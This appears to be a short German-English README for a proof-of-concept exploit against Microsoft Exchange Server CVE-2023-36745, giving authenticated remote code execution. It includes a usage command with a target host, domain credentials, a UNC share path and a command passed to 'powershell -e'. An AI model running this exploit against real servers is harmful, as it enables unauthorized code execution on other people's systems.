
Proof-of-Concept-Exploit für die Microsoft-Exchange-Server-RCE-Schwachstelle CVE-2023-36745, die Remote-Codeausführung über authentifizierte PowerShell-Befehlsinjektion ermöglicht.
Microsoft Exchange Server CVE-2023-36745 RCE PoC.
Beispiel:
python3 exp.py -H exchange.webdxg.com -u webdxg.com\dddai -p 4IDF7LAU -s \\192.168.237.131\Shares\ -c calc.exe
Der Befehl wird an powershell -e übergeben.